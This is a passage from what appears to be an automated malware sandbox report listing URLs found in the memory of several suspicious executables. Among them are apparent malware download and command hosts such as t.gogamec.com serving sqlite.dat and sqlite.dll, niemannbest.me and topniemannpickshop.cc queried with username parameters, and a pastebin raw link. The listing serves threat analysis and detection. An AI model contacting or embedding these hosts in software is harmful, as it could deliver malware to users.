                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_5
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://niemannbest.me/?username=p11_7
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DAE2000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                  Source: edb.log.43.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000324E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/A7dSG1te
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000324E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com:443/raw/A7dSG1te.
                  Source: explorer.exe, 0000002F.00000002.4182753346.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1918788309.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.goamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.goga:9
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogame.v
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.co
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2671780241.0000000000AB3000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670381145.00000000030DB000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/
                  Source: Mon17742f90b916675f2.exeString found in binary or memory: https://t.gogamec.com/%d/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com//y
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670381145.00000000030DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/1
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlit.~
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.da
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4165043648.00000000033DB000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4165043648.00000000033DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat%
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat&r3
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat/
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506209340.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat0(
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat=
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4150744585.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datD
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datJu
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datNr
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datO
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506209340.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datP
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4165043648.00000000033DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datQ
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datS
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506209340.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datT
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datW
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datlu
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datpr
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datq
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datu
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4165043648.00000000033DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datw
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4150744585.00000000009FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.datx
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032D2000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506209340.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/2302/sqlite.dat~
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/232
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1818750478.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/4p0
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/9
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1818750478.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820732501.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/=p9
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1818750478.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820732501.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Bs
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/C
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/D
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.0000000003263000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.0000000003272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/F
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/I
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Ji
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1828562477.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1818750478.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820732501.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Ls
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/M
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.0000000003263000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.0000000003272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/O
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1818750478.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1847669211.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Us
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2672392366.0000000003040000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4159473879.0000000003045000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3504725915.0000000003041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Xc
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.0000000003263000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.0000000003272000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2669661426.0000000003253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/Y
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/_
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3506530200.0000000000A6B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/d
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2673024974.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2671780241.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/g
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.0000000003263000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.0000000003272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/j
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1859456387.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/os
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1831342016.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/ps
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4150744585.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/q
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2669661426.0000000003253000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/s
                  Source: Mon17742f90b916675f2.exeString found in binary or memory: https://t.gogamec.com/sqlite.dll
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4148644975.0000000000866000.00000004.00000001.01000000.0000000E.sdmpString found in binary or memory: https://t.gogamec.com/sqlite.dllhttps://t.gogamec.com/%d/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.1820732501.0000000000A43000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672226318.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.1820315915.0000000000A43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/ys
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4155333560.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3503554014.0000000000AB9000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.3506572383.0000000000ABD000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com/z
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sZ
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat$
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat$8
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat(
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat)https://t.gogamec.com/2302/sqlite.dat3
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat02/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3503640215.00000000032A1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4163257710.00000000032A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dat9
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datG
                  Source: Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datP
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datPrxy
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datT
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datc.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datd
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.date.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.3506530200.0000000000A6B000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000002.4154013550.0000000000A68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datm
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2670638470.0000000000AA1000.00000004.00000020.00020000.00000000.sdmp, Mon17742f90b916675f2.exe, 00000012.00000003.2672447483.0000000000AA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datp
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dats://t.gogamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datt.gogamec.com/2302/sqlite.dat
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2013350124.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.dattc
                  Source: Mon17742f90b916675f2.exe, 00000012.00000003.2017416180.000000000302E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.gogamec.com:443/2302/sqlite.datx
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002473000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000248B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmp, Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000245C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.000000000245C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_1
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_2
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.00000000024E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_3
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_4
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_5
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_6
                  Source: Mon1795d04d4bd.exe, 0000001C.00000002.1835005291.0000000002519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://topniemannpickshop.cc/?username=p11_7
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                  Source: explorer.exe, 0000002F.00000000.1884635558.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
